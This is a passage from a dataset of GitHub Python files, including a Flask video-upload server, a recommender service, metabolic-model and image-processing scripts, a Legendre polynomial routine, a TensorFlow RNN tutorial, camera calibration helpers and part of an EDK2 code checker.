final\n","repo_name":"leomardsr/Programas","sub_path":"python/1. tutoriales/graficos/GUI_1.pyw","file_name":"GUI_1.pyw","file_ext":"pyw","file_size_in_byte":240,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26308394957","text":"from __future__ import print_function\n\nfrom flask import Flask, request, send_from_directory, jsonify\nfrom flask_cors import CORS\nfrom werkzeug.utils import secure_filename\nfrom utility import *\nfrom conf import *\nfrom video_parser import HighlightMaker\nfrom bing_search import *\n\n\nimport os\n\n# base_url = 'http://52.53.158.244/video/'\n# base_url_original = 'http://52.53.158.244/video/original/'\n# ROOT_FOLDER = '/var/www/html/caltech-ms-server/'\n# VIDEOS_FOLDER = '/var/www/html/caltech-ms-server/videos/'\n# EDITED_VIDEOS_FOLDER = '/var/www/html/caltech-ms-server/edited_videos/'\n\nbase_url = 'http://127.0.0.1:5000/video/'\nbase_url_original = 'http://127.0.0.1:5000/video/original/'\nROOT_FOLDER = './'\nVIDEOS_FOLDER = './videos/'\nEDITED_VIDEOS_FOLDER = './edited_videos/'\n\napp = Flask(__name__)\nCORS(app)\n\napp.config['VIDEOS_FOLDER'] = VIDEOS_FOLDER\napp.config['EDITED_VIDEOS_FOLDER'] = EDITED_VIDEOS_FOLDER\n\n\n@app.route('/')\ndef home():\n return 'Caltech Hackathon'\n\n\ndef process_video(filename):\n hm = HighlightMaker()\n hm.extractHighlight(filename)\n\n\ndef speech_process(filename):\n annotations = scrape_important(filename)\n\n results = []\n for item in annotations:\n results.append({\n 'begin': item[0],\n 'topic': item[1],\n 'link': item[2]\n })\n\n return jsonify(results=results, url=base_url_original+filename)\n\n\n\n@app.route('/video/upload', methods=['POST'])\ndef video_upload():\n if request.method == 'POST':\n # check if the post request has the file part\n if Categories.ENTERTAINMENT not in request.files and Categories.SPEECH not in request.files and Categories.CLASSROOM not in request.files:\n return jsonify(\n error=\"No file part\"\n )\n elif Categories.ENTERTAINMENT in request.files:\n category = Categories.ENTERTAINMENT\n elif Categories.SPEECH in request.files:\n category = Categories.SPEECH\n elif Categories.CLASSROOM in request.files:\n category = Categories.CLASSROOM\n\n f = request.files[category]\n\n # if user does not select file, browser also\n # submit a empty part without filename\n if f.filename == '':\n return jsonify(\n error=\"No selected file\"\n )\n\n if f and allowed_file(f.filename):\n filename = secure_filename(f.filename)\n\n path = os.path.join(app.config['VIDEOS_FOLDER'], filename)\n f.save(path)\n\n if category == Categories.ENTERTAINMENT or category == Categories.SPEECH:\n process_video(filename)\n return jsonify(\n url=base_url+filename\n )\n elif category == Categories.CLASSROOM:\n return speech_process(filename)\n\n\n return jsonify(\n error=\"Could not upload file\"\n )\n\n\n\n@app.route('/video/', methods=['GET'])\ndef retrieve_video(filename):\n dir = app.config['EDITED_VIDEOS_FOLDER']\n return send_from_directory(dir, filename)\n\n\n@app.route('/video/original/', methods=['GET'])\ndef retrieve_original_video(filename):\n dir = app.config['VIDEOS_FOLDER']\n return send_from_directory(dir, filename)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"hnguyen0428/caltech-ms-server","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40630987957","text":"import json\nimport sys\n\nfrom flask import Flask, request, Response,jsonify\nfrom cortex_client import OutputMessage\n\n\n\nimport pandas as pd\nimport os\nimport turicreate\n\n\n\n\n\nratings = pd.read_csv('data.csv', sep=',', header=0)\nratings['user']= ratings['user_name'].astype('category').cat.codes\n\ndef getUserId(name):\n df = ratings[ratings['user_name']==name]['user'].max()\n if(df>=0):\n return df\n else :\n return -1\n\n\ntrain_data = turicreate.SFrame(ratings)\n#Training the model\nitem_sim_model = turicreate.item_similarity_recommender.create(train_data, user_id='user', item_id='item', target='rating', similarity_type='cosine')\n\napp = Flask(__name__)\n\n@app.route('/ping', methods=['GET'])\ndef health():\n return Response(status=200,\n response=json.dumps({'message': 'success'}),\n mimetype='application/json')\n\n\n@app.route('/invoke', methods=['POST'])\ndef invokeJob():\n params = json.loads(request.data)\n req = params.get('payload').get('test_data')\n token = params.get('token')\n user= req.get('user')\n try:\n #Making recommendations\n userid = int(getUserId(user))\n #app.logger.error(\"userid \"+userid)\n item_sim_recomm = item_sim_model.recommend(users=[userid],k=5)\n resp = {\"items\":list(item_sim_recomm['item'])}\n return Response(status=200,\n response=json.dumps(OutputMessage.create().with_payload(\n resp).to_params()),\n mimetype='application/json')\n except Exception:\n ex = sys.exc_info()\n return Response(status=500,\n response=json.dumps(OutputMessage.create().with_payload(\n str(ex)).to_params()),\n mimetype='application/json')\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=6000, threaded=True)\n","repo_name":"dipali-vasani/thepiratebay-ml","sub_path":"skills/recommend/src/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72444200489","text":"from CobraMetabolicModel import CobraMetabolicModel\nfrom MetabolicModel import MetabolicModel\nfrom Spreadsheet import Spreadsheet\n\n\n\nMODEL = \"/home/alex/PycharmProjects/tfg/models/test_models/aureus.xml\"\n\ndef main():\n # Init model\n cobra_model = MetabolicModel(CobraMetabolicModel(MODEL))\n cobra_model.spreadsheet_init()\n\n # Shows info\n cobra_model.print_model_info()\n cobra_model.spreadsheet_write_model_info(\"Model\")\n cobra_model.spreadsheet_write_reactions(\"Reactions\", ordered=True)\n cobra_model.spreadsheet_write_metabolites(\"Metabolites\", ordered=True)\n\n ####### TAREA 1.1 #######\n # Find dead end metabolites of the net\n print(\"Searching Dead End Metabolites\")\n cobra_model.find_dem()\n\n # Save dem found\n cobra_model.spreadsheet_write_dem(\"1.1 DEM\", ordered=True)\n\n ####### TAREA 2.1 #######\n # Find chokepoint reactions\n print(\"Searching Chokepoint reactions\")\n cobra_model.find_chokepoints()\n\n # Save chokepoint reactions\n cobra_model.spreadsheet_write_chokepoints(\"2.1 Chokepoint\", ordered=True)\n\n ####### TAREA 1.2 #######\n # Delete dem and clean net\n print(\"Removing Dead End Metabolites\")\n cobra_model.remove_dem()\n\n # Save new net info\n cobra_model.spreadsheet_write_model_info(\"1.2 Model\")\n\n ####### TAREA 2.2 #######\n # Find chokepoints on the new net\n print(\"Searching Chokepoint reactions on the new network\")\n cobra_model.find_chokepoints()\n\n # Save chokepoints found\n cobra_model.spreadsheet_write_chokepoints(\"2.2 Chokepoint\", ordered=True)\n\n ####### TAREA 3 #######\n # Load original model\n print(\"Running Flux Variability Analysis and updating the bounds\")\n cobra_model.read_model(MODEL)\n\n # Change reaction bounds with the ones obtained with F.V.A.\n cobra_model.fva(update_flux=True)\n\n # Save F.V.A. result\n cobra_model.spreadsheet_write_fva(\"3 FVA\", ordered=True)\n cobra_model.spreadsheet_write_reactions(\"3 Reactions\", ordered=True)\n\n print(\"Searching Dead End Metabolites\")\n cobra_model.find_dem()\n\n # Save DEM\n cobra_model.spreadsheet_write_dem(\"3 DEM\", ordered=True)\n\n print(\"Searching Chokepoints\")\n cobra_model.find_chokepoints()\n\n # Save chokepoints\n cobra_model.spreadsheet_write_chokepoints(\"3 Chokepoint\", ordered=True)\n\n ####### TAREA 4 #######\n print(\"Searching essential genes reactions\")\n cobra_model.find_essential_genes_reactions()\n\n # Save essential genes\n cobra_model.spreadsheet_write_essential_genes(\"4 Essential genes\")\n\n # Save chokeponint and essential genes reactions\n cobra_model.spreadsheet_write_reactions(\"4 Reactions\", ordered=True, tag_chokepoints=True, tag_essential_genes=True)\n\n path = \"main.xls\"\n print(\"Saving results to file: \", path)\n cobra_model.spreadsheet_save_file(path)\n\ndef test():\n cobra_model = MetabolicModel(CobraMetabolicModel(MODEL))\n cobra_model.print_dem()\n cobra_model.print_chokepoints()\n cobra_model.print_model_info()\n cobra_model.print_metabolites()\n cobra_model.print_reactions()\n cobra_model.print_genes()\n cobra_model.print_essential_genes()\n cobra_model.print_essential_genes_reactions()\n cobra_model.print_essential_reactions()\n\n\ntest()\n","repo_name":"alexOarga/findCritical","sub_path":"main/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"41026560593","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 18 00:02:21 2019\n\n@author: kanthonye\n\"\"\"\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n \nimg = cv2.imread('q2-eql_hist-overexposed.jpg')\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nblr = cv2.GaussianBlur(img, (3,3), -10) # remove noise\n\ncv2.imwrite('q4-spatial_filtering.jpg', blr)\n\n#lap = cv2.Laplacian(blr, cv2.CV_64F) # convolute \n\nsob = cv2.Sobel(blr, cv2.CV_64F, 1, 1, ksize=3)\ncv2.imwrite('q4-first_order_derivative.jpg', sob)\n\nsob = cv2.Sobel(sob, cv2.CV_64F, 1, 1, ksize=3)\ncv2.imwrite('q4-second_order_derivative.jpg', sob)\n\nsob = cv2.convertScaleAbs(sob)\nsrp = cv2.addWeighted(sob, 1.5, sob, -0.75, 0) # unshapen \n\ncv2.imwrite('q4-unshapen.jpg', srp)","repo_name":"kanthonye/school-projects","sub_path":"qc/image-processing/proj2/Q4.py","file_name":"Q4.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18913243330","text":"#!/usr/bin/env python\nu\"\"\"\nplm_mohlenkamp.py\nWritten by Tyler Sutterley (05/2021)\n\nComputes fully-normalized associated Legendre Polynomials\n for an array of x values\nUses Martin Mohlenkamp's recursion relation derived from the\n Szego (1939) Recurrence formula for Jacobi Polynomials (Pg 71)\n\nWith this algorithm, the associated Legendre Functions are\n constructed as an amplitude times a Jacobi Polynomial\n P[l,m](cos(theta)) = (sin(theta)^2)*J[l-m,m,m](cos(theta))\n\nCALLING SEQUENCE:\n plm = plm_mohlenkamp(LMAX, np.cos(theta))\n\nINPUTS:\n LMAX: Upper bound of Spherical Harmonic Degrees\n x: elements ranging from -1 to 1\n typically cos(theta), where theta is the colatitude in radians\n\nOUTPUT:\n plm: Legendre polynomials (geodesy normalization)\n\nOPTIONS:\n MMAX: Upper bound of Spherical Harmonic Orders (default = LMAX)\n\nPYTHON DEPENDENCIES:\n numpy: Scientific Computing Tools For Python (https://numpy.org)\n\nNOTES:\n Modified and updated from IDL plm_x.pro coded by Sean Swenson\n Difference from martin function in geoid_mk.mac.f:\n plms from plm_mohlenkamp are normalized inside the function\n plms from martin are normalized outside the function\n For large spherical harmonic degrees this recurrence relation\n is poorly conditioned\n For spherical harmonic orders above ~1000 can cause overflows\n\nREFERENCES:\n Martin Mohlenkamp, \"A User's Guide to Spherical Harmonics\"\n http://www.ohiouniversityfaculty.com/mohlenka/research/uguide.pdf\n\nUPDATE HISTORY:\n Updated 05/2021: define int/float precision to prevent deprecation warning\n Updated 09/2020: verify dimensions of input x variable\n Updated 07/2020: added function docstrings\n Updated 05/2015: added parameter MMAX for MMAX != LMAX\n Written 09/2013\n\"\"\"\nimport numpy as np\n\ndef plm_mohlenkamp(LMAX, x, MMAX=None):\n \"\"\"\n Computes fully-normalized associated Legendre Polynomials\n using Martin Mohlenkamp's recursion relation\n\n Arguments\n ---------\n LMAX: Upper bound of Spherical Harmonic Degrees\n x: elements ranging from -1 to 1\n\n Keyword arguments\n -----------------\n MMAX: Upper bound of Spherical Harmonic Orders\n\n Returns\n -------\n plms: fully-normalized Legendre polynomials\n \"\"\"\n\n #-- Verify LMAX as integer\n LMAX = np.int64(LMAX)\n #-- upper bound of spherical harmonic orders (default = LMAX)\n if MMAX is None:\n MMAX = np.copy(LMAX)\n\n #-- removing singleton dimensions of x\n x = np.atleast_1d(x).flatten()\n #-- length of the x array\n sx = len(x)\n\n #-- Initialize the output Legendre polynomials\n plm=np.zeros((LMAX+1,MMAX+1,sx))\n #-- Jacobi polynomial for the recurrence relation\n jlmm=np.zeros((LMAX+1,MMAX+1,sx))\n #-- for x=cos(th): rsin= sin(th)\n rsin=np.sqrt(1.0 - x**2)\n\n #-- for all spherical harmonic orders of interest\n for mm in range(0,MMAX+1):#-- equivalent to 0:MMAX\n #-- Initialize the recurrence relation\n #-- J-1,m,m Term == 0\n #-- J0,m,m Term\n if (mm > 0):\n #-- j ranges from 1 to mm for the product\n j = np.arange(0,mm)+1.0\n jlmm[0,mm,:] = np.prod(np.sqrt(1.0 + 1.0/(2.0*j)))/np.sqrt(2.0)\n else: #-- if mm == 0: jlmm = 1/sqrt(2)\n jlmm[0,mm,:] = 1.0/np.sqrt(2.0)\n #-- Jk,m,m Terms\n for k in range(1, LMAX+1):#-- computation for SH degrees\n #-- Initialization begins at -1\n #-- this is to make the formula parallel the function written in\n #-- Martin Mohlenkamp's Guide to Spherical Harmonics\n #-- Jacobi General Terms\n if (k == 1):#-- for degree 1 terms\n jlmm[k,mm,:] = 2.0*x * jlmm[k-1,mm,:] * \\\n np.sqrt(1.0 + (mm - 0.5)/k) * \\\n np.sqrt(1.0 - (mm - 0.5)/(k + 2.0*mm))\n else:#-- for all other spherical harmonic degrees\n jlmm[k,mm,:] = 2.0*x * jlmm[k-1,mm,:] * \\\n np.sqrt(1.0 + (mm - 0.5)/k) * \\\n np.sqrt(1.0 - (mm - 0.5)/(k + 2.0*mm)) - \\\n jlmm[k-2,mm,:] * np.sqrt(1.0 + 4.0/(2.0*k + 2.0*mm - 3.0)) * \\\n np.sqrt(1.0 - (1.0/k)) * np.sqrt(1.0 - 1.0/(k + 2.0*mm))\n #-- Normalization is geodesy convention\n for l in range(mm,LMAX+1): #-- equivalent to mm:LMAX\n if (mm == 0):#-- Geodesy normalization (m=0) == sqrt(2)*sin(th)^0\n #-- rsin^mm term is dropped as rsin^0 = 1\n plm[l,mm,:] = np.sqrt(2.0)*jlmm[l-mm,mm,:]\n else:#-- Geodesy normalization all others == 2*sin(th)^mm\n plm[l,mm,:] = 2.0*(rsin**mm)*jlmm[l-mm,mm,:]\n return plm\n","repo_name":"geodeepak/GRACE_HYDL","sub_path":"gravity_toolkit/plm_mohlenkamp.py","file_name":"plm_mohlenkamp.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"679282772","text":"import tensorflow as tf \nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error, classification_report\n\n\n# class that able to create a data and generate batches to send it back\n\nclass TimeSeriesData () :\n def __init__(self, num_points, xmin, xmax) :\n self.xmin = xmin\n self.xmax = xmax\n self.num_points = num_points\n self.resolution = (xmax-xmin) / num_points\n self.x_data = np.linspace(xmin, xmax, num_points)\n self.y_true = np.sin(self.x_data)\n\n # comparing data that we don't have\n def ret_true(self, x_series) :\n return(np.sin(x_series))\n\n # genarate batches of data\n def next_batch(self, batch_size, steps, return_batch_ts = False):\n # grab a random starting point for each batch\n rand_start = np.random.rand(batch_size,1)\n\n # convert to be on time series\n ts_start = rand_start * (self.xmax - self.xmin - (steps*self.resolution))\n \n # create batch time series on the x axis\n batch_ts = ts_start + np.arange(0.0, steps+1) * self.resolution\n \n # create y data for the time series x axis from previous steps\n y_batch = np.sin(batch_ts)\n\n # formatting for RNN\n if return_batch_ts :\n return y_batch[:,:-1].reshape(-1,steps,1) , y_batch[:,1:].reshape(-1,steps,1), batch_ts\n else :\n return y_batch[:,:-1].reshape(-1,steps,1) , y_batch[:,1:].reshape(-1,steps,1)\n \n\nts_data = TimeSeriesData(250,0,10) # 250 points between 0 and 10\n\nnum_time_steps = 30\n\ny1, y2, ts = ts_data.next_batch(1,num_time_steps, True)\n\n# plt.plot(ts.flatten()[1:], y2.flatten(), '*', label='single traing instance') #flatten means take everythinf in one list\n# plt.plot(ts_data.x_data, ts_data.y_true, label='sin(t)')\n# plt.legend()\n# plt.tight_layout() \n\n# plt.show()\n\n# trainin Data\ntrain_inst = np.linspace(5,5+ts_data.resolution*(num_time_steps+1), num_time_steps+1)\n\n#plt.title('A Training Instance')\n#plt.plot(train_inst[:-1],ts_data.ret_true(train_inst[:-1]), 'bo', markersize=15, alpha=0.5,label='INSTANCE')\n# predict one time step\n#plt.plot(train_inst[1:],ts_data.ret_true(train_inst[1:]), 'ko', markersize=5, alpha=0.5,label='Target')\n#plt.show()\n\n################ create the model ####################\n\ntf.reset_default_graph()\nnum_input = 1 # basically one feature in ts\nnum_neurons = 100 # 100 neurons in one layer\nnum_outputs = 1\nlearning_rate = 0.01\nnum_train_iterations = 2000\nbatch_size = 1\n\n# palceholders\nx = tf.placeholder(tf.float32,[None, num_time_steps,num_input])\ny = tf.placeholder(tf.float32,[None, num_time_steps,num_outputs])\n\n# RNN cell layer\n#BasicLSTMCell, GRUCell, MultiRNNCell\ncell = tf.contrib.rnn.GRUCell(num_units=num_neurons, activation=tf.nn.relu)\ncell = tf.contrib.rnn.OutputProjectionWrapper(cell, output_size= num_outputs)\n\n# get output and states of these basic RNN cells\noutputs, states = tf.nn.dynamic_rnn(cell=cell,inputs= x, dtype=tf.float32)\n\n#lost function and optimizer\n# MSE as loss function\nloss = tf.reduce_mean(tf.square(outputs-y))\n\n#optimizer\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntrain = optimizer.minimize(loss)\n\n#Session\nsaver = tf.train.Saver() # save the model\n\nwith tf.Session() as sess :\n sess.run(tf.global_variables_initializer())\n\n for iteration in range(num_train_iterations) :\n x_batch, y_batch = ts_data.next_batch(batch_size,num_time_steps)\n sess.run(train, feed_dict={x: x_batch, y:y_batch})\n\n if iteration % 100 == 0 :\n mse = loss.eval(feed_dict={x: x_batch, y:y_batch})\n print(iteration, \"\\tMSE\", mse)\n \n saver.save(sess,\"./rnn_time_series_model_codealong\")\n\n\nwith tf.Session() as sess :\n saver.restore(sess, \"./rnn_time_series_model_codealong\")\n\n x_new = np.sin(np.array(train_inst[:-1].reshape(-1,num_time_steps,num_input)))\n y_pred = sess.run(outputs, feed_dict={x:x_new})\n\n#graph\n#traing instance\nplt.plot(train_inst[:-1],np.sin(train_inst[:-1]), \"bo\", markersize=15,alpha=0.5,label='trainig_instance')\n\n#target to predect (correct test valus np.sin(train))\nplt.plot(train_inst[1:], np.sin(train_inst[1:]),\"ko\", markersize=10,label=\"target\")\n\n#model predection\nplt.plot(train_inst[1:], y_pred[0,:,0],'r.', markersize=10, label='predection')\nplt.xlabel('TIME')\nplt.legend()\nplt.tight_layout()\n\nplt.show()\n\n\n\n","repo_name":"Rasika666/ml","sub_path":"tensorflow/RNN.py","file_name":"RNN.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71742742887","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\n\ndef calculate_intrinsics_1d(x3, z3, x2):\n \"\"\"\n Calculate f and c values such that f3/x3 * f + c = x2.\n\n Args:\n x3: array length n, representing '3d' x coordinate.\n z3: array length n, representing '3d' z coordinate.\n x2: array length n, representing '2d' x coordinate.\n\n Returns:\n f: focal length in 1d\n c: pixel offset in 1d\n \"\"\"\n n = x3.shape[0]\n assert(x3.shape == (n,))\n assert(x3.shape == z3.shape == (n,))\n assert(x2.shape == (n,))\n A = np.ones((n, 2))\n A[:, 0] = x3 / z3\n sol, res, rank, s = np.linalg.lstsq(A, x2)\n\n assert(sol.shape == (2,))\n f, c = sol\n return f, c\n\n\ndef calculate_intrinsics_2d(p3, p2, dtype=np.float32):\n \"\"\"\n Calculate f and c values such that transforms.project(p3, f, c) = p2.\n\n i.e.\n p3[:, :2] / p3[:, 2:] * f + c = p2\n\n Args:\n p3: 3d coordinates, shape (n, 3)\n p2: 2d coordintaes, shape (n, 2)\n Returns:\n f: np array with 2 entries, focal lengths\n c: np array with 2 entries, pixel offset\n \"\"\"\n n = p3.shape[0]\n assert(p3.shape == (n, 3))\n assert(p2.shape == (n, 2))\n fcs = [calculate_intrinsics_1d(\n p3[:, i], p3[:, 2], p2[:, i]) for i in range(2)]\n f = np.array([fc[0] for fc in fcs], dtype=dtype)\n c = np.array([fc[1] for fc in fcs], dtype=dtype)\n return f, c\n\n\ncalculate_intrinsics = calculate_intrinsics_2d\n\n\ndef calculate_extrinsics(A, B, overwrite=False):\n \"\"\"\n Calculate rotation, translation and scale such that k*A*R.T + t = B.\n\n Args:\n A: matrix, shape (n, m)\n B: matrix, shape (n, m)\n overwrite: if true, values of A and B are overwritten\n\n Returns:\n R: matrix, shape (m, m). Orthogonal, i.e. dot(R, R.T) = 0\n t: vector, shape (n,)\n k: scalar\n such that k*np.dot(A, R.T) + t = B\n\n Base on scipy.spatial.procruste.\n \"\"\"\n from scipy.linalg import orthogonal_procrustes\n if not overwrite:\n A = A.copy()\n B = B.copy()\n ta = np.mean(A, axis=0)\n tb = np.mean(B, axis=0)\n A -= ta\n B -= tb\n ka = np.linalg.norm(A)\n kb = np.linalg.norm(B)\n if ka == 0 or kb == 0:\n raise ValueError(\"Input matrices must contain >1 unique points\")\n A /= ka\n B /= kb\n R, S = orthogonal_procrustes(A, B)\n k = kb / ka\n t = tb - k*np.dot(ta, R)\n R = R.T\n return R, t, k\n\n\nif __name__ == '__main__':\n from np_impl import project\n n = 100\n p3 = np.abs(np.random.random((n, 3)))\n p3[:, 2] += 10\n f = np.array([105, 101])\n c = np.array([1000, 2000])\n\n p2 = project(p3, f, c)\n\n fi, ci = calculate_intrinsics(p3, p2)\n print(fi - f)\n print(ci - c)\n","repo_name":"jackd/human_pose_util","sub_path":"human_pose_util/transforms/camera_params.py","file_name":"camera_params.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"44006690437","text":"from typing import Tuple\nfrom ..errors.entity_errors import ParamNotValidated\nfrom ..enums.item_type_enum import ItemTypeEnum\n\nclass User:\n name: str\n agency: str\n account: str\n current_balance: float\n\n def __init__(self, name: str = None, agency: str = None, account: str = None, current_balance: float = None):\n validation_name = self.validate_name(name)\n if validation_name[0] is False:\n raise ParamNotValidated(\"name\", validation_name[1])\n self.name = name\n\n validation_agency = self.validate_agency(agency)\n if validation_agency[0] is False:\n raise ParamNotValidated(\"agency\", validation_agency[1])\n self.agency = agency\n\n validation_account = self.validate_account(account)\n if validation_account[0] is False:\n raise ParamNotValidated(\"account\", validation_account[1])\n self.account = account\n\n validation_current_balance = self.validate_current_balance(current_balance)\n if validation_current_balance[0] is False:\n raise ParamNotValidated(\"current balance\", validation_current_balance[1])\n self.current_balance = current_balance\n \n @staticmethod\n def validate_name(name: str) -> Tuple[bool, str]:\n if name is None:\n return (False, \"Name is required\")\n if type(name) != str:\n return (False, \"Name must be a str\")\n if len(name) < 3:\n return (False, \"Name must be at least 3 characters long\")\n return (True, \"\")\n \n @staticmethod\n def validate_agency(agency: str) -> Tuple[bool, str]:\n if str is None:\n return (False, \"Agency is required\")\n if type(agency) != str:\n return (False, \"Agency must be a str\")\n if len(agency) != 4:\n return (False, \"Agency must be a four digit number\")\n return (True, \"\")\n \n @staticmethod\n def validate_account(account: str) -> Tuple[bool, str]:\n if account is None:\n return (False, \"Account is required\")\n if type(account) != str:\n return (False, \"Account must be a str\")\n if len(account) != 7:\n return (False, \"Account must have a valid format\")\n return (True, \"\")\n \n @staticmethod\n def validate_current_balance(current_balance: float) -> Tuple[bool, str]:\n if current_balance < 0:\n return (False, \"Current balance must be positive\")\n if type(current_balance) != float:\n return (False, \"Current balance must be a float\")\n return (True, \"\")\n \n def to_dict(self):\n return {\n \"name\": self.name,\n \"agency\": self.agency,\n \"account\": self.account,\n \"current_balance\": self.current_balance\n }","repo_name":"Maua-Dev/devbank_fernanda_e_yasmin","sub_path":"src/app/entities/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37608608869","text":"## @file\r\n# This file is used to define checkpoints used by ECC tool\r\n#\r\n# Copyright (c) 2021, Arm Limited. All rights reserved.
\r\n# Copyright (c) 2008 - 2020, Intel Corporation. All rights reserved.
\r\n# SPDX-License-Identifier: BSD-2-Clause-Patent\r\n#\r\nfrom __future__ import absolute_import\r\nimport Common.LongFilePathOs as os\r\nimport re\r\nfrom CommonDataClass.DataClass import *\r\nimport Common.DataType as DT\r\nfrom Ecc.EccToolError import *\r\nfrom Ecc.MetaDataParser import ParseHeaderCommentSection\r\nfrom Ecc import EccGlobalData\r\nfrom Ecc import c\r\nfrom Common.LongFilePathSupport import OpenLongFilePath as open\r\nfrom Common.MultipleWorkspace import MultipleWorkspace as mws\r\n\r\n## Check\r\n#\r\n# This class is to define checkpoints used by ECC tool\r\n#\r\n# @param object: Inherited from object class\r\n#\r\nclass Check(object):\r\n def __init__(self):\r\n pass\r\n\r\n # Check all required checkpoints\r\n def Check(self):\r\n self.GeneralCheck()\r\n self.MetaDataFileCheck()\r\n self.DoxygenCheck()\r\n self.IncludeFileCheck()\r\n self.PredicateExpressionCheck()\r\n self.DeclAndDataTypeCheck()\r\n self.FunctionLayoutCheck()\r\n self.NamingConventionCheck()\r\n self.SmmCommParaCheck()\r\n\r\n def SmmCommParaCheck(self):\r\n self.SmmCommParaCheckBufferType()\r\n\r\n\r\n # Check if SMM communication function has correct parameter type\r\n # 1. Get function calling with instance./->Communicate() interface\r\n # and make sure the protocol instance is of type EFI_SMM_COMMUNICATION_PROTOCOL.\r\n # 2. Find the origin of the 2nd parameter of Communicate() interface, if -\r\n # a. it is a local buffer on stack\r\n # report error.\r\n # b. it is a global buffer, check the driver that holds the global buffer is of type DXE_RUNTIME_DRIVER\r\n # report success.\r\n # c. it is a buffer by AllocatePage/AllocatePool (may be wrapped by nested function calls),\r\n # check the EFI_MEMORY_TYPE to be EfiRuntimeServicesCode,EfiRuntimeServicesData,\r\n # EfiACPIMemoryNVS or EfiReservedMemoryType\r\n # report success.\r\n # d. it is a buffer located via EFI_SYSTEM_TABLE.ConfigurationTable (may be wrapped by nested function calls)\r\n # report warning to indicate human code review.\r\n # e. it is a buffer from other kind of pointers (may need to trace into nested function calls to locate),\r\n # repeat checks in a.b.c and d.\r\n def SmmCommParaCheckBufferType(self):\r\n if EccGlobalData.gConfig.SmmCommParaCheckBufferType == '1' or EccGlobalData.gConfig.SmmCommParaCheckAll == '1':\r\n EdkLogger.quiet(\"Checking SMM communication parameter type ...\")\r\n # Get all EFI_SMM_COMMUNICATION_PROTOCOL interface\r\n CommApiList = []\r\n for IdentifierTable in EccGlobalData.gIdentifierTableList:\r\n SqlCommand = \"\"\"select ID, Name, BelongsToFile from %s\r\n where Modifier = 'EFI_SMM_COMMUNICATION_PROTOCOL*' \"\"\" % (IdentifierTable)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n if RecordSet:\r\n for Record in RecordSet:\r\n if Record[1] not in CommApiList:\r\n CommApiList.append(Record[1])\r\n # For each interface, check the second parameter\r\n for CommApi in CommApiList:\r\n for IdentifierTable in EccGlobalData.gIdentifierTableList:\r\n SqlCommand = \"\"\"select ID, Name, Value, BelongsToFile, StartLine from %s\r\n where Name = '%s->Communicate' and Model = %s\"\"\" \\\r\n % (IdentifierTable, CommApi, MODEL_IDENTIFIER_FUNCTION_CALLING)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n if RecordSet:\r\n # print IdentifierTable\r\n for Record in RecordSet:\r\n # Get the second parameter for Communicate function\r\n SecondPara = Record[2].split(',')[1].strip()\r\n SecondParaIndex = None\r\n if SecondPara.startswith('&'):\r\n SecondPara = SecondPara[1:]\r\n if SecondPara.endswith(']'):\r\n SecondParaIndex = SecondPara[SecondPara.find('[') + 1:-1]\r\n SecondPara = SecondPara[:SecondPara.find('[')]\r\n # Get the ID\r\n Id = Record[0]\r\n # Get the BelongsToFile\r\n BelongsToFile = Record[3]\r\n # Get the source file path\r\n SqlCommand = \"\"\"select FullPath from File where ID = %s\"\"\" % BelongsToFile\r\n NewRecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n FullPath = NewRecordSet[0][0]\r\n # Get the line no of function calling\r\n StartLine = Record[4]\r\n # Get the module type\r\n SqlCommand = \"\"\"select Value3 from INF where BelongsToFile = (select ID from File\r\n where Path = (select Path from File where ID = %s) and Model = 1011)\r\n and Value2 = 'MODULE_TYPE'\"\"\" % BelongsToFile\r\n NewRecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n ModuleType = NewRecordSet[0][0] if NewRecordSet else None\r\n\r\n # print BelongsToFile, FullPath, StartLine, ModuleType, SecondPara\r\n\r\n Value = FindPara(FullPath, SecondPara, StartLine)\r\n # Find the value of the parameter\r\n if Value:\r\n if 'AllocatePage' in Value \\\r\n or 'AllocatePool' in Value \\\r\n or 'AllocateRuntimePool' in Value \\\r\n or 'AllocateZeroPool' in Value:\r\n pass\r\n else:\r\n if '->' in Value:\r\n if not EccGlobalData.gException.IsException(\r\n ERROR_SMM_COMM_PARA_CHECK_BUFFER_TYPE, Value):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_SMM_COMM_PARA_CHECK_BUFFER_TYPE,\r\n OtherMsg=\"Please review the buffer type\"\r\n + \"is correct or not. If it is 